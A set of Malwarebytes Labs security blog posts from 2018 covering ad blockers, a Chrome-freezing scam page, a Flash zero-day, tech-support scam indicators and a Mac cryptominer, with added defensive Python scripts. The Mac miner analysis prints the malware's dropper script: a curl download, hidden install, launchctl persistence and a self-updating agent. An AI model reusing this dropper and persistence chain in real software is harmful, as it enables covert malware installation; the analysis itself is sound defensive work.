Feb 6, 2018

Safer Internet Day 2018: ad blockers and anti-trackers

The path to a safer Internet can be a bit of a quandary. What programs should you buy? How long should your passwords be? Is it okay to write them down? What makes a website secure?

All of these questions can merit their own lengthy essays, so today, on Safer Internet Day, we’re going to look at some of the simplest solutions for security. What is the easiest, fastest, completely free thing you can do to have a safer Internet experience? The answer: ad blockers and anti-tracking browser extensions. Let’s take a look at how.

Ad blockers

Some people feel that ad blockers are unethical, as they deprive others in the content chain of income. While this can be debated, it’s indisputable that cybercriminals love using ads as a malware delivery mechanism.

Traditionally, bad ads have delivered exploit kits, forced redirects, fake plugin updates, and more. Recently, malicious ads have been caught running cryptominers, monopolizing your CPU to make the owners a few pennies. Given that you can’t be infected by an ad that doesn’t load, you might want to check out one of the following ad blockers.

uBlock Origin (Chrome, Firefox, Safari, Edge)

Is simply blocking most ads not good enough for you? Does the idea of “acceptable ads” seem like a contradiction? uBlock Origin might be for you. Most ad blockers are designed for the casual user, eschewing features in favor of a low barrier to entry. uBlock Origin is built to give the user maximum power over what content they see, with block granularity down to individual ads on a single site. uBlock Origin used to lose points for being a little tough to get going, but its interface has improved: it now gives a simplified dashboard of the nastiness it’s blocking, as well as a much more detailed view if you’re so inclined.

Adblock (Chrome, Firefox, Safari, Edge, Android)

Adblock is one of the earlier blockers out there, and is relatively easy to set and forget. Depending on your block list subscriptions, it may not banish 100 percent of ads from your view, and occasionally struggles with YouTube pre-roll ads.

While its baseline functionality is perfectly serviceable, many privacy advocates take issue with Adblock’s policy on “acceptable ads.” Basically, if your ad meets certain criteria making it less annoying than most, Adblock will let it through. This is something that can be switched off if you’d prefer, but blocking advocates tend to be irritated by the need to go menu diving for what they view as a core function of any blocker—blocking ads.

1Blocker (iOS)

Mobile ads, even when not malicious, are some of the worst out there. We’ve observed tech support scams, forced redirects to PUP downloads, and lock screens on the rise for all mobile platforms. 1Blocker’s free version gives you back control of what code runs on your iPhone, and in some instances reduces the load on your battery as well.


Anti-trackers

When you visit a website, part of its content will be delivered by domains separate from the one you actually clicked on. Some of these domains host trackers that send information about your browsing habits to third parties, often for the purpose of serving up ads. Not only can this feel like a violation of privacy, it also means longer load times and wasted bandwidth.

This is a little harder to understand in terms of safety. Aren’t all those people up in arms over privacy concerns being a little paranoid? The threat here is not that Google AdWords is going to take your aggregated data and use it to come club you over the head. A more realistic threat is that AdWords and other poorly vetted (that is to say—all of them) ad networks are accumulating data at a scale that is impossible to moderate, police, or secure.

Given that third parties have had a pretty awful track record at protecting customer data stores at scale, perhaps we should let them have less of it. Anti-tracking browser extensions like Ghostery and the EFF’s Privacy Badger are easy to install, and give you back some measure of control over who is holding onto data about your Internet use.
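To make the anti-tracking idea concrete, here is a simplified version of the heuristic Privacy Badger documents: a third-party domain that is seen setting or sending an identifier on three or more distinct first-party sites gets classified as a tracker and is blocked from then on. This is an added example in Python, not the extension’s own code; the public-suffix table is a toy stand-in for the real Public Suffix List, and the browsing log it runs over is constructed for the example.

```python
from collections import defaultdict

# Toy public-suffix table, constructed for this example. The real heuristic
# consults the full Public Suffix List to find the registrable domain.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "github.io"}

# Privacy Badger's documented threshold: a third-party domain is treated as a
# tracker once it has been seen tracking on three distinct first-party sites.
TRACKING_THRESHOLD = 3


def base_domain(host):
    """Registrable domain (eTLD+1) of a hostname under the toy suffix table."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def learn_trackers(requests, threshold=TRACKING_THRESHOLD):
    """Heuristic tracker learning over a browsing log.

    requests: iterable of (page_host, request_host, carries_identifier), where
    carries_identifier is True when the request sent or set a cookie (or some
    other identifier) for the third-party domain.
    Returns {tracker_base_domain: sorted first-party sites it was seen on}
    for every domain observed on at least `threshold` distinct sites.
    """
    seen_on = defaultdict(set)
    for page_host, request_host, carries_identifier in requests:
        site, third = base_domain(page_host), base_domain(request_host)
        if site == third or not carries_identifier:
            continue  # first-party, or stateless (no identifier): not tracking
        seen_on[third].add(site)
    return {d: sorted(sites) for d, sites in seen_on.items() if len(sites) >= threshold}


def should_block(trackers, page_host, request_host):
    """Block decision for one request: third-party and a learned tracker."""
    third = base_domain(request_host)
    return third != base_domain(page_host) and third in trackers


# Constructed browsing log: (page visited, resource requested, identifier sent).
SAMPLE_LOG = [
    ("news.example.com", "static.example.com", True),           # first party
    ("news.example.com", "tracker.adnet-example.com", True),
    ("news.example.com", "cdn.static-example.net", False),       # no cookie
    ("shop.example.co.uk", "tracker.adnet-example.com", True),
    ("shop.example.co.uk", "cdn.static-example.net", False),
    ("shop.example.co.uk", "analytics.metrics-example.com", True),
    ("blog.example.org", "tracker.adnet-example.com", True),
    ("blog.example.org", "analytics.metrics-example.com", True),
    ("forum.example.net", "tracker.adnet-example.com", True),
    ("forum.example.net", "cdn.static-example.net", False),
]

if __name__ == "__main__":
    trackers = learn_trackers(SAMPLE_LOG)
    for domain, sites in trackers.items():
        print(domain, "seen tracking on", ", ".join(sites))
    print(should_block(trackers, "news.example.com", "img.adnet-example.com"))
```

Note the two deliberate non-decisions: a first-party asset host is never counted, and a third-party CDN that carries no identifier is never counted however many sites it appears on, which is why the real extension blocks trackers rather than all third-party content.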

How do these services keep me safe?

At its core, safety is not a product or service; safety is a collection of behaviors. While we referred to a handful of products above, they’re really just tools in furtherance of an important behavior: keeping control of what data goes out, and what code comes into your system.

Keeping a vigilant eye on both processes can go a long way towards staying safe online without spending a lot of money. To learn a little more about common online threats, check out our post on bad ads here, and our post on avoiding scams here.

Stay safe, everyone!

The post Safer Internet Day 2018: ad blockers and anti-trackers appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 6, 2018

Tech support scammers find new way to jam Google Chrome

During the past quarter we have noted an increase in fake browser alerts pushing tech support scams. Most of these campaigns come from malicious advertising but also via compromised web sites. Crooks are using all sorts of tricks to not only scare users but also to try and ‘lock’ their browsers.

One such technique, involving the history.pushState API, which we reported on earlier on this blog, has since been patched but is still in use. There are also the infamous pop-unders, which can be arranged so that users are stuck between various tabs.

In yet another twist, scammers are now abusing another API that achieves their intended goal of freezing the browser. By doing so they hope that users will panic and call the toll-free number for assistance. The following animation shows what a user may experience with Google Chrome’s latest version (64.0.3282.140).

Figure 1: What happens when you visit the booby-trapped page.

The code responsible for this is embedded within the main page, and slightly obfuscated:

Figure 2: The underlying code shown with functions such as ‘bomb_ch’ or ‘ch_jam’

The Blob constructor coupled with the window.navigator.msSaveOrOpenBlob method lets a page save files locally and, as you may have guessed, is what is being abused here. One caveat: msSaveOrOpenBlob is a non-standard Microsoft API (Internet Explorer and the EdgeHTML-based Edge); Chrome does not implement it, so the Chrome variant has to reach the same result through the standard route of attaching a Blob URL to an anchor element with a download attribute and clicking it from script. Either way, the page ends up triggering downloads without the user asking for them.

The ch_jam() function calls another function, bomb_ch(); both are aptly named for what they do. bomb_ch() in turn calls the download function that uses the aforementioned Blob constructor.

It happens too fast to see how it works, but you may be able to spot it with a powerful enough machine and if you try to close the tab early on. That code triggers a very large number of downloads in rapid fire, which causes the browser to become unresponsive within a few seconds, and unable to be closed via normal means.

Figure 3: Attempting to close the browser tab before it gets jammed reveals what is going on

The primary targets of this particular browser freeze are Google Chrome users on Windows. Other browsers get their own landing pages that abuse other HTML APIs. Given that Chrome has the largest browser market share, this is yet another example of threat actors tailoring new social engineering schemes to where the users are.

Since most of these browser lockers are distributed via malvertising, an effective mitigation method is to use an ad-blocker. As a last resort, the Windows Task Manager will allow you to forcefully quit the offending browser processes. Malwarebytes users were already protected against the redirection mechanism used in this attack.

The post Tech support scammers find new way to jam Google Chrome appeared first on Malwarebytes Labs.


Feb 5, 2018

New Flash Player zero-day comes inside Office document

A new Flash Player zero-day has been found in recent targeted attacks, as reported by KrCERT. The flaw, present in the Flash Player release current at the time and all earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a security advisory acknowledging this zero-day:

Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.

Threat actors used a decoy Microsoft Excel document to lure their intended targets (South Korean users) and infect them with a remote administration tool named ROKRAT. Not obvious at first glance, an ActiveX object embedded in the document contains the Flash exploit. Highlighting the cells reveals a small white rectangle that represents the embedded object:

Upon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:

  • a unique identifier
  • the Flash Player version
  • the Operating System version

This is an important step because it retrieves a key used to decrypt the malicious shellcode.
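As an added example (not part of the original post or of the exploit analysis), the following Python triage script scans an .xlsx for the kind of embedding described above: it lists ActiveX/OLE parts, looks for the Shockwave Flash control’s CLSID in the ActiveX XML, and searches every part for a plausible SWF header, since the Flash file is normally wrapped in an OLE container rather than stored at offset 0. The workbook it builds is constructed here (a minimal zip standing in for a real .xlsx, with a fake CWS header) and contains no exploit.

```python
import io
import struct
import zipfile

# Header magic of a Flash (SWF) file: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
# CLSID of the Shockwave Flash ActiveX control, as it appears in the workbook's
# xl/activeX/activeXN.xml part when Flash content is embedded through ActiveX.
FLASH_CLSID = b"D27CDB6E-AE6D-11CF-96B8-444553540000"


def swf_header_at(data, offset):
    """True if an SWF header plausibly starts at `offset`: magic, version byte,
    little-endian uncompressed length, and a zlib header byte for CWS."""
    if len(data) < offset + 8 or data[offset:offset + 3] not in SWF_MAGICS:
        return False
    version = data[offset + 3]
    length = struct.unpack_from("<I", data, offset + 4)[0]
    if not (1 <= version <= 60) or length < 21:
        return False
    if data[offset:offset + 3] == b"CWS" and data[offset + 8:offset + 9] != b"\x78":
        return False
    return True


def find_swf_headers(data):
    """Offsets of plausible SWF headers anywhere in a byte string (the SWF may
    sit inside an OLE stream, so the magic need not be at offset 0)."""
    hits = []
    for magic in SWF_MAGICS:
        pos = data.find(magic)
        while pos != -1:
            if swf_header_at(data, pos):
                hits.append(pos)
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def find_embedded_flash(xlsx_bytes):
    """Scan every part of an OOXML workbook (a zip) and return (part, reason)
    pairs pointing at embedded Flash content."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if name.lower().startswith(("xl/activex/", "xl/embeddings/")):
                findings.append((name, "ActiveX/OLE embedding part"))
            if FLASH_CLSID in data.upper():
                findings.append((name, "Shockwave Flash ActiveX CLSID"))
            for off in find_swf_headers(data):
                findings.append((name, "SWF header (%s) at offset %d" % (data[off:off + 3].decode(), off)))
    return findings


def build_sample_workbook(with_flash):
    """Constructed stand-in for an .xlsx: the minimum parts a workbook zip has,
    plus, when with_flash is True, an ActiveX part carrying a fake CWS blob."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if with_flash:
            zf.writestr("xl/activeX/activeX1.xml",
                        '<ax:ocx ax:classid="{D27CDB6E-AE6D-11cf-96B8-444553540000}"/>')
            # OLE-like filler, then a fake zlib-compressed SWF header (version 10,
            # declared length 4096) followed by a zlib stream marker.
            fake_swf = b"CWS" + bytes([10]) + struct.pack("<I", 4096) + b"\x78\x9c" + b"\x00" * 32
            zf.writestr("xl/activeX/activeX1.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 60 + fake_swf)
    return buf.getvalue()


if __name__ == "__main__":
    for part, reason in find_embedded_flash(build_sample_workbook(True)):
        print(part, "->", reason)
```

Run it over a real workbook with find_embedded_flash(open("suspect.xlsx", "rb").read()); any hit is a reason to detonate the file in a sandbox rather than open it, and the version byte and length checks keep three-byte magic matches inside ordinary XML text from producing noise.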

By the time we had access to this sample, the websites hosting the key and payload were down, which stopped the exploitation chain before it could retrieve and run the payload. Malwarebytes detects the remote administration tool that was dropped and blocks the sites known to have hosted the key and payload.

Adobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall the Flash Player. We expect that this exploit will be used in larger scale attacks, including via malicious spam. We will keep you updated of any further developments.

Indicators of compromise


SWF exploit


The post New Flash Player zero-day comes inside Office document appeared first on Malwarebytes Labs.


Feb 5, 2018

A week in security (January 29 – February 04)

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdater that can be distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017, and then began to fizzle like a dying firecracker at end of the year onwards.

Other news

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.


Feb 5, 2018

Boomerang spam bombs Malwarebytes forum—not a smart move

Tech support scammers are generally not the best and brightest. As such, they will occasionally post ads for their fake companies in the comment sections here or on the Malwarebytes forums. Last week, however, scammers struggled with configuring their spambots, resulting in spam bombs on the forum lasting roughly 72 hours, with a slow taper down for two more days.

Over six days, 246 spam accounts associated with this activity were banned. We wondered what threat actor group would exercise such phenomenally poor judgment, so we drilled down a bit into who these people are.

As it turns out, the majority of the spam was posted for a threat actor we were already familiar with: Boomerang Tech Solutions. Boomerang runs scams with an antivirus theme, so they need to use the Malwarebytes brand to appear properly comprehensive to victims. They also look to legitimate AV customers for scam targets. Over the past year, Boomerang has:

  • Posted ads to our forums
  • Posted ads to blog comment sections
  • Maintained Twitter accounts to direct traffic to their domains
  • Monitored the Facebook pages of various AV companies to find customers requesting tech support. They then targeted those customers with linked phone numbers, claiming to be the company in question.
  • Made outbound calls to victims as Malwarebytes, then subsequently deleted MBAM from victim systems

As you can imagine, this behavior has not endeared them to US-based merchant processors, leaving them with pay by check as the primary payment option. (More on why alternative payment options tend to be bad here.)


Our counterfraud team has observed the following Indicators of Compromise (IOCs) related to Boomerang activity:

Website                           Twitter handle
Antivirus-support-number[.]com    @Malwrebytes
Boomerangtechnologies[.]info      @malwarebytes4
www.antivirustechnicalhelp[.]com  @malwarebytes_
www.wisdomsquad[.]com             @malwarebytetech
www.seccurityexperts[.]com        @quickencontact2
liveantivirushelp[.]com           n/a
antivirusconsulting[.]com         n/a


How Boomerang rips us off

When Boomerang first came on our radar about a year ago, we called them up to see precisely how victims are being targeted. As you can see in the video of our call below, there’s nothing at all original here. Boomerang tells us that we are bedeviled by “illegal connections” sending our data overseas. The only slightly unusual parts are the relatively high quality of their website (most of these guys struggle with HTML), and the phone rep who told us that Malwarebytes does not protect from “viruses coming from the Internet.” Check out the video to see the standard Boomerang pitch.

How to stay safe

First and foremost, be a little extra suspicious of any company that is reluctant to accept payment by credit card. If they can’t process card payments easily, there’s probably a good (bad) reason why. If you’ve had a run-in with these or any other tech support scammers (on our site, forum, or anywhere else), you can find information on what to do next here.

Have you been contacted by someone claiming to be us or our representative? See how to evaluate those claims here. Lastly, if you’ve dealt with anyone from Boomerang yourself, post to the comments below to let others know your experience. Stay suspicious and stay safe.

The post Boomerang spam bombs Malwarebytes forum—not a smart move appeared first on Malwarebytes Labs.


Feb 2, 2018

New Mac cryptominer distributed via a MacUpdate hack

Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer’s CPU to mine the Monero currency.

The malware was spread via a hack of the MacUpdate site, which was distributing maliciously modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.

Both OnyX and Deeper are products made by Titanium Software (titanium-software.fr), but the site was changed maliciously to point to download URLs at titaniumsoftware.org, a domain first registered on January 23, and whose ownership is obscured. The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick to make you think it’s coming from a legitimate site.)

The downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, as would the original, non-malicious .dmg files for those apps.

The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation of these applications had a low bar for entry.

Once the application has been installed, when the user opens it, it will download and install the payload from public.adobecc.com (a legitimate site owned by Adobe). Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.

However, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.

The “script” file inside the app takes care of opening the decoy app, and then downloading and installing the malware.

open Deeper.app
if [ -f ~/Library/mdworker/mdworker ]; then
  killall Deeperd
else
  # the download URL is not reproduced on this page
  nohup curl -o ~/Library/mdworker.zip "<download URL omitted>?content_disposition=attachment" \
    && unzip -o ~/Library/mdworker.zip -d ~/Library \
    && mkdir -p ~/Library/LaunchAgents \
    && mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents \
    && sleep 300 \
    && launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist \
    && rm -rf ~/Library/mdworker.zip \
    && killall Deeperd &
fi

For those who can’t read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.

If the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is hidden in macOS by default, so most users wouldn’t even know anything had been added there. It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.

# output path inferred from the launchctl load that follows; the URL is not reproduced on this page
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist \
  && rm -rf ~/Library/LaunchAgents/MacOS.plist \
  && curl -o ~/Library/LaunchAgents/MacOS.plist "<download URL omitted>?content_disposition=attachment" \
  && launchctl load -w ~/Library/LaunchAgents/MacOS.plist \
  && ...   # the command continues; the remainder is not shown on the page

When this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove the previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist file that we obtained did the real work.

sh -c ~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr

This loads a malicious sysmdworker process, passing in a couple arguments, one of which is an email address.

That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to minergate.com, passing in the above email address as the login.
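Launch agents of this shape are easy to spot once you know what to look for. The following Python script is an added example, not part of the original post, that parses every plist in ~/Library/LaunchAgents and flags agents whose command line points into user-writable locations or carries tokens such as curl, nohup, sh -c or launchctl. The three sample agents are constructed to mirror the two described above (with a placeholder URL and a made-up StartInterval, since neither is reproduced here) plus a benign one; on a Mac it reads the real directory instead.

```python
import os
import plistlib
import re

# Places a non-admin user can write without a password. A launch agent whose
# program or arguments point here, rather than under /Applications, /usr or
# /System, deserves a closer look. Constructed pattern for this example.
USER_WRITABLE_PATH = re.compile(
    r"(?:~|/Users/[^/\s]+)/(?:Library|Downloads|\.[^/\s]+)/\S+|/(?:private/)?tmp/\S+")
# Tokens that rarely belong in a legitimate per-user launch agent command line.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "nohup ", "sh -c", "base64", "launchctl ")


def command_line(plist):
    """The command a launch agent runs, joined into one string."""
    parts = [plist["Program"]] if "Program" in plist else []
    parts += list(plist.get("ProgramArguments", []))
    return " ".join(parts)


def assess_agent(plist):
    """Reasons to look at this agent; an empty list means nothing stood out."""
    cmd = command_line(plist)
    reasons = []
    for path in sorted(set(USER_WRITABLE_PATH.findall(cmd))):
        reasons.append("runs from user-writable location: " + path)
    for token in SUSPICIOUS_TOKENS:
        if token in cmd:
            reasons.append("command contains %r" % token.strip())
    return reasons


def triage(agents):
    """agents: {filename: parsed plist}. Returns only the flagged ones."""
    flagged = {}
    for name, plist in agents.items():
        reasons = assess_agent(plist)
        if reasons:
            flagged[name] = reasons
    return flagged


def load_launch_agents(directory=os.path.expanduser("~/Library/LaunchAgents")):
    """Parse every .plist in a LaunchAgents folder; unreadable files are skipped."""
    agents = {}
    if os.path.isdir(directory):
        for fn in sorted(os.listdir(directory)):
            if fn.endswith(".plist"):
                try:
                    with open(os.path.join(directory, fn), "rb") as fh:
                        agents[fn] = plistlib.load(fh)
                except Exception:
                    pass
    return agents


# Constructed samples, round-tripped through plistlib so they look like parsed
# files. The URL and the 3600-second interval are placeholders.
SAMPLE_AGENTS = {
    "MacOSupdate.plist": plistlib.loads(plistlib.dumps({
        "Label": "MacOSupdate",
        "ProgramArguments": ["sh", "-c",
            "launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && "
            "rm -rf ~/Library/LaunchAgents/MacOS.plist && "
            "curl -o ~/Library/LaunchAgents/MacOS.plist https://example.invalid/MacOS.plist && "
            "launchctl load -w ~/Library/LaunchAgents/MacOS.plist"],
        "RunAtLoad": True, "StartInterval": 3600})),
    "MacOS.plist": plistlib.loads(plistlib.dumps({
        "Label": "MacOS",
        "ProgramArguments": ["sh", "-c",
            "~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr"],
        "RunAtLoad": True, "KeepAlive": True})),
    "com.example.helper.plist": plistlib.loads(plistlib.dumps({
        "Label": "com.example.helper",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper", "--daemon"],
        "RunAtLoad": True})),
}

if __name__ == "__main__":
    agents = load_launch_agents() or SAMPLE_AGENTS
    for name, reasons in triage(agents).items():
        print(name)
        for reason in reasons:
            print("   ", reason)
```

A hit is a starting point, not a verdict: plenty of legitimate agents live in ~/Library, so follow up by checking the binary’s signature and what it connects to. The same checks apply to /Library/LaunchAgents and /Library/LaunchDaemons if you pass those directories in.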

There are multiple takeaways from this. First and foremost, never download software from any kind of “download aggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.

Instead, always download software directly from the developer’s site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. Be sure to check around to make sure the software is legitimate before downloading, but do not give full credence to ratings or reviews on third-party sites or the Mac App Store, as those can be faked.

Second, if you have downloaded a new application and it seems not to be functioning as expected—such as not opening at all when you double-click it—be suspicious. Consider scanning your computer with security software. Malwarebytes for Mac will detect this malware as OSX.CreativeUpdater.

Finally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is being disproved more often every year. This is the third piece of Mac malware so far this year, following OSX.MaMi and OSX.CrossRAT, and that doesn’t even count the wide variety of adware and junk software out there. Do not let yourself believe that Macs don’t get infected; that belief makes you more vulnerable.

The post New Mac cryptominer distributed via a MacUpdate hack appeared first on Malwarebytes Labs.


Feb 2, 2018

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically, to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop


Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.



Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks in 2017, security tools have become better equipped to deal with ransomware threats. In addition, independent researchers have released many standalone programs that decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools), together with falling prices for file storage, has helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.



The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website than to build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. Cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low-traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on YouTube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a fast-moving plague, and it throws the old argument over whether blocking ads hurts publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts


Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

